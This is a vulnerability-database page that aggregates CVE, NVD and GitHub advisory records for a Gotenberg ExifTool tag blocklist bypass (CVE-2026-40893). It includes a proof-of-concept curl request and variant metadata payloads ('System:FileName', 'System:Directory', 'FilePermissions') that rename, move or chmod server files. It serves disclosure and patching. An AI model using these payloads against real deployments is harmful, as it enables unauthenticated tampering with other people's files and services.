Vulnerability-Lookup

CVE-2026-40893 (GCVE-0-2026-40893)

Vulnerability from cvelistv5 – Published: 2026-05-14 15:18 – Updated: 2026-05-14 18:08

Title

Gotenberg: ExifTool Dangerous Tag Blocklist Bypass via Group-Prefixed Tag Names Allows Arbitrary File Rename and Move

Summary

Gotenberg is a Docker-powered stateless API for PDF files. Prior to 8.31.0, Gotenberg only checks if the tag is exactly FileName, so System:FileName slips right through and ExifTool happily renames the file. This allows remote attackers to move, rename, and change permissions for arbitrary files. This vulnerability is fixed in 8.31.0.

Severity

8.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L

CWE

CWE-73 - External Control of File Name or Path
CWE-184 - Incomplete List of Disallowed Inputs

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/gotenberg/gotenberg/security/a…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
gotenberg	gotenberg	Affected: < 8.31.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-40893",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-14T18:08:23.445431Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-14T18:08:26.208Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "gotenberg",
          "vendor": "gotenberg",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 8.31.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Gotenberg is a Docker-powered stateless API for PDF files. Prior to 8.31.0, Gotenberg only checks if the tag is exactly FileName, so System:FileName slips right through and ExifTool happily renames the file. This allows remote attackers to move, rename, and change permissions for arbitrary files. This vulnerability is fixed in 8.31.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-73",
              "description": "CWE-73: External Control of File Name or Path",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-184",
              "description": "CWE-184: Incomplete List of Disallowed Inputs",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-14T15:18:27.758Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4"
        }
      ],
      "source": {
        "advisory": "GHSA-62p3-hvxx-fxg4",
        "discovery": "UNKNOWN"
      },
      "title": "Gotenberg: ExifTool Dangerous Tag Blocklist Bypass via Group-Prefixed Tag Names Allows Arbitrary File Rename and Move"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-40893",
    "datePublished": "2026-05-14T15:18:27.758Z",
    "dateReserved": "2026-04-15T16:37:22.766Z",
    "dateUpdated": "2026-05-14T18:08:26.208Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-40893",
      "date": "2026-05-31",
      "epss": "0.00155",
      "percentile": "0.35885"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-40893\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-14T16:16:20.323\",\"lastModified\":\"2026-05-18T13:02:17.390\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Gotenberg is a Docker-powered stateless API for PDF files. Prior to 8.31.0, Gotenberg only checks if the tag is exactly FileName, so System:FileName slips right through and ExifTool happily renames the file. This allows remote attackers to move, rename, and change permissions for arbitrary files. This vulnerability is fixed in 8.31.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L\",\"baseScore\":8.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":4.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-73\"},{\"lang\":\"en\",\"value\":\"CWE-184\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:thecodingmachine:gotenberg:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"8.31.0\",\"matchCriteriaId\":\"953D4808-E728-472B-94E3-9714C1E2EA1C\"}]}]}],\"references\":[{\"url\":\"https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-40893\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-14T18:08:23.445431Z\"}}}], \"references\": [{\"url\": \"https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-14T18:08:18.299Z\"}}], \"cna\": {\"title\": \"Gotenberg: ExifTool Dangerous Tag Blocklist Bypass via Group-Prefixed Tag Names Allows Arbitrary File Rename and Move\", \"source\": {\"advisory\": \"GHSA-62p3-hvxx-fxg4\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"gotenberg\", \"product\": \"gotenberg\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 8.31.0\"}]}], \"references\": [{\"url\": \"https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4\", \"name\": \"https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Gotenberg is a Docker-powered stateless API for PDF files. Prior to 8.31.0, Gotenberg only checks if the tag is exactly FileName, so System:FileName slips right through and ExifTool happily renames the file. This allows remote attackers to move, rename, and change permissions for arbitrary files. This vulnerability is fixed in 8.31.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-73\", \"description\": \"CWE-73: External Control of File Name or Path\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-184\", \"description\": \"CWE-184: Incomplete List of Disallowed Inputs\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-14T15:18:27.758Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-40893\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-14T18:08:26.208Z\", \"dateReserved\": \"2026-04-15T16:37:22.766Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-14T15:18:27.758Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-40893

Vulnerability from fkie_nvd - Published: 2026-05-14 16:16 - Updated: 2026-05-18 13:02

Severity

8.2 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4	Exploit, Vendor Advisory
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	thecodingmachine	gotenberg	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:thecodingmachine:gotenberg:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "953D4808-E728-472B-94E3-9714C1E2EA1C",
              "versionEndExcluding": "8.31.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Gotenberg is a Docker-powered stateless API for PDF files. Prior to 8.31.0, Gotenberg only checks if the tag is exactly FileName, so System:FileName slips right through and ExifTool happily renames the file. This allows remote attackers to move, rename, and change permissions for arbitrary files. This vulnerability is fixed in 8.31.0."
    }
  ],
  "id": "CVE-2026-40893",
  "lastModified": "2026-05-18T13:02:17.390",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 8.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 4.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-14T16:16:20.323",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-73"
        },
        {
          "lang": "en",
          "value": "CWE-184"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-62P3-HVXX-FXG4

Vulnerability from github – Published: 2026-05-04 19:21 – Updated: 2026-05-14 20:51

Summary

Gotenberg has an ExifTool Dangerous Tag Blocklist Bypass via Group-Prefixed Tag Names that Allows Arbitrary File Rename and Move

Details

Summary

Gotenberg blocks certain ExifTool tag names like FileName and Directory to stop attackers from renaming or moving files on the server. But ExifTool allows a longer form of the same tag — System:FileName — which does the exact same thing. Gotenberg only checks if the tag is exactly FileName, so System:FileName slips right through and ExifTool happily renames the file. No login is needed. One HTTP request is enough.

This bypasses the fix from GHSA-qmwh-9m9c-h36m.

Details

Think of it like a nightclub bouncer with a blocklist of banned names. The blocklist says "Block anyone named John." A person shows up and says "I'm Mr. John." The bouncer checks — "Mr. John" is not "John" — so he lets them in. But inside the club, everyone knows Mr. John IS John.

That's exactly what happens here:

The blocklist (exiftool.go line 275-280) blocks these tag names:

FileName
Directory
HardLink
SymLink

The check (exiftool.go line 295-301) compares what the user sent against this list:

if strings.EqualFold(key, tag) {   // is "System:FileName" equal to "FileName"?
    delete(metadata, key)            // no — so it's NOT deleted
}

System:FileName is not equal to FileName (one is 16 characters, the other is 8), so it passes through.

But ExifTool treats them as the same thing. In ExifTool, System: is just a group prefix — like a folder name before the tag. System:FileName and FileName both mean "rename this file." The ExifTool docs say: "A tag name may include leading group names separated by colons."

Why the colon is allowed: The key validation regex (exiftool.go line 31) explicitly permits colons:

var safeKeyPattern = regexp.MustCompile(`^[a-zA-Z0-9\-_.:]+$`)
//                                                    ^ colon is allowed

So the full chain is:

Attacker sends System:FileName → passes the regex (colon is allowed)
System:FileName → passes the blocklist (it's not equal to FileName)
ExifTool receives System:FileName → treats it as FileName → renames the file

Bonus finding: The FilePermissions tag is not in the blocklist at all. Sending {"FilePermissions": "rwxrwxrwx"} tells ExifTool to chmod the file, and nothing stops it.

PoC

Setup — start Gotenberg with default settings:

docker run -d --name gotenberg-poc -p 3000:3000 gotenberg/gotenberg:8

Create a folder inside the container where we'll move the file to:

docker exec gotenberg-poc mkdir -p /tmp/evil

Send the attack — one curl command:

curl -X POST http://localhost:3000/forms/pdfengines/metadata/write \
  -F 'files=@any-pdf-file.pdf' \
  -F 'metadata={"System:FileName":"stolen.pdf","System:Directory":"/tmp/evil"}'

This returns HTTP 404 because the file got moved before the server could return it.

Check that the file actually moved:

docker exec gotenberg-poc ls -la /tmp/evil/

Result:

-rw-r--r-- 1 gotenberg gotenberg 17789 Apr 13 07:40 stolen.pdf

The file is sitting in /tmp/evil/stolen.pdf. It was renamed from its random UUID name to stolen.pdf and moved out of the temporary directory — exactly what the blocklist was supposed to prevent.

Proof that the existing blocklist works for bare names (control test):

curl -X POST http://localhost:3000/forms/pdfengines/metadata/write \
  -F 'files=@any-pdf-file.pdf' \
  -F 'metadata={"FileName":"stolen.pdf","Directory":"/tmp/evil"}'

This returns HTTP 500 — the bare FileName tag was correctly blocked. Only the System:FileName variant gets through.

Other ways to exploit the same bug:

system:filename (lowercase) — also works because ExifTool is case-insensitive
system:directory — moves the file to any writable folder
FilePermissions — changes the file's permissions (this tag is simply missing from the blocklist entirely)

Every endpoint that accepts the metadata field is affected, including /forms/chromium/convert/html, /forms/libreoffice/convert, /forms/pdfengines/merge, and all other conversion routes.

Impact

Any person who can send HTTP requests to Gotenberg (no login needed by default) can:

Move files anywhere inside the container by using System:Directory
Rename files to anything by using System:FileName
Change file permissions by using FilePermissions (this tag is not blocked at all)
Break the service for other users — when a file gets moved mid-request, the server returns 404 errors

In real-world deployments where Gotenberg shares a Docker volume with other services (which is common), an attacker can drop a PDF file with controlled content into that shared folder — potentially affecting whatever service reads files from there.

Severity

8.2 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/gotenberg/gotenberg/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "8.30.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40893"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-04T19:21:19Z",
    "nvd_published_at": "2026-05-14T16:16:20Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nGotenberg blocks certain ExifTool tag names like `FileName` and `Directory` to stop attackers from renaming or moving files on the server. But ExifTool allows a longer form of the same tag \u2014 `System:FileName` \u2014 which does the exact same thing. Gotenberg only checks if the tag is exactly `FileName`, so `System:FileName` slips right through and ExifTool happily renames the file. No login is needed. One HTTP request is enough.\n\nThis bypasses the fix from [GHSA-qmwh-9m9c-h36m](https://github.com/gotenberg/gotenberg/security/advisories/GHSA-qmwh-9m9c-h36m).\n\n### Details\n\nThink of it like a nightclub bouncer with a blocklist of banned names. The blocklist says \"Block anyone named **John**.\" A person shows up and says \"I\u0027m **Mr. John**.\" The bouncer checks \u2014 \"Mr. John\" is not \"John\" \u2014 so he lets them in. But inside the club, everyone knows Mr. John IS John.\n\nThat\u0027s exactly what happens here:\n\n**The blocklist** (`exiftool.go` line 275-280) blocks these tag names:\n\n```\nFileName\nDirectory\nHardLink\nSymLink\n```\n\n**The check** (`exiftool.go` line 295-301) compares what the user sent against this list:\n\n```go\nif strings.EqualFold(key, tag) {   // is \"System:FileName\" equal to \"FileName\"?\n    delete(metadata, key)            // no \u2014 so it\u0027s NOT deleted\n}\n```\n\n`System:FileName` is not equal to `FileName` (one is 16 characters, the other is 8), so it passes through.\n\n**But ExifTool treats them as the same thing.** In ExifTool, `System:` is just a group prefix \u2014 like a folder name before the tag. `System:FileName` and `FileName` both mean \"rename this file.\" The [ExifTool docs](https://exiftool.org/exiftool_pod.html) say: *\"A tag name may include leading group names separated by colons.\"*\n\n**Why the colon is allowed:** The key validation regex (`exiftool.go` line 31) explicitly permits colons:\n\n```go\nvar safeKeyPattern = regexp.MustCompile(`^[a-zA-Z0-9\\-_.:]+$`)\n//                                                    ^ colon is allowed\n```\n\nSo the full chain is:\n\n1. Attacker sends `System:FileName` \u2192 passes the regex (colon is allowed)\n2. `System:FileName` \u2192 passes the blocklist (it\u0027s not equal to `FileName`)\n3. ExifTool receives `System:FileName` \u2192 treats it as `FileName` \u2192 **renames the file**\n\n**Bonus finding:** The `FilePermissions` tag is not in the blocklist at all. Sending `{\"FilePermissions\": \"rwxrwxrwx\"}` tells ExifTool to chmod the file, and nothing stops it.\n\n### PoC\n\n**Setup \u2014 start Gotenberg with default settings:**\n\n```bash\ndocker run -d --name gotenberg-poc -p 3000:3000 gotenberg/gotenberg:8\n```\n\n\n**Create a folder inside the container where we\u0027ll move the file to:**\n\n```bash\ndocker exec gotenberg-poc mkdir -p /tmp/evil\n```\n\n**Send the attack \u2014 one curl command:**\n\n```bash\ncurl -X POST http://localhost:3000/forms/pdfengines/metadata/write \\\n  -F \u0027files=@any-pdf-file.pdf\u0027 \\\n  -F \u0027metadata={\"System:FileName\":\"stolen.pdf\",\"System:Directory\":\"/tmp/evil\"}\u0027\n```\n\nThis returns HTTP 404 because the file got moved before the server could return it.\n\n**Check that the file actually moved:**\n\n```bash\ndocker exec gotenberg-poc ls -la /tmp/evil/\n```\n\n**Result:**\n\n```\n-rw-r--r-- 1 gotenberg gotenberg 17789 Apr 13 07:40 stolen.pdf\n```\n\nThe file is sitting in `/tmp/evil/stolen.pdf`. It was renamed from its random UUID name to `stolen.pdf` and moved out of the temporary directory \u2014 exactly what the blocklist was supposed to prevent.\n\n**Proof that the existing blocklist works for bare names (control test):**\n\n```bash\ncurl -X POST http://localhost:3000/forms/pdfengines/metadata/write \\\n  -F \u0027files=@any-pdf-file.pdf\u0027 \\\n  -F \u0027metadata={\"FileName\":\"stolen.pdf\",\"Directory\":\"/tmp/evil\"}\u0027\n```\n\nThis returns HTTP 500 \u2014 the bare `FileName` tag was correctly blocked. Only the `System:FileName` variant gets through.\n\n**Other ways to exploit the same bug:**\n\n- `system:filename` (lowercase) \u2014 also works because ExifTool is case-insensitive\n- `system:directory` \u2014 moves the file to any writable folder\n- `FilePermissions` \u2014 changes the file\u0027s permissions (this tag is simply missing from the blocklist entirely)\n\n**Every endpoint that accepts the `metadata` field is affected**, including `/forms/chromium/convert/html`, `/forms/libreoffice/convert`, `/forms/pdfengines/merge`, and all other conversion routes.\n\n### Impact\n\nAny person who can send HTTP requests to Gotenberg (no login needed by default) can:\n\n- **Move files anywhere** inside the container by using `System:Directory`\n- **Rename files** to anything by using `System:FileName`\n- **Change file permissions** by using `FilePermissions` (this tag is not blocked at all)\n- **Break the service** for other users \u2014 when a file gets moved mid-request, the server returns 404 errors\n\nIn real-world deployments where Gotenberg shares a Docker volume with other services (which is common), an attacker can drop a PDF file with controlled content into that shared folder \u2014 potentially affecting whatever service reads files from there.",
  "id": "GHSA-62p3-hvxx-fxg4",
  "modified": "2026-05-14T20:51:32Z",
  "published": "2026-05-04T19:21:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40893"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gotenberg/gotenberg"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gotenberg has an ExifTool Dangerous Tag Blocklist Bypass via Group-Prefixed Tag Names that Allows Arbitrary File Rename and Move"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-40893 (GCVE-0-2026-40893)

FKIE_CVE-2026-40893

GHSA-62P3-HVXX-FXG4

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature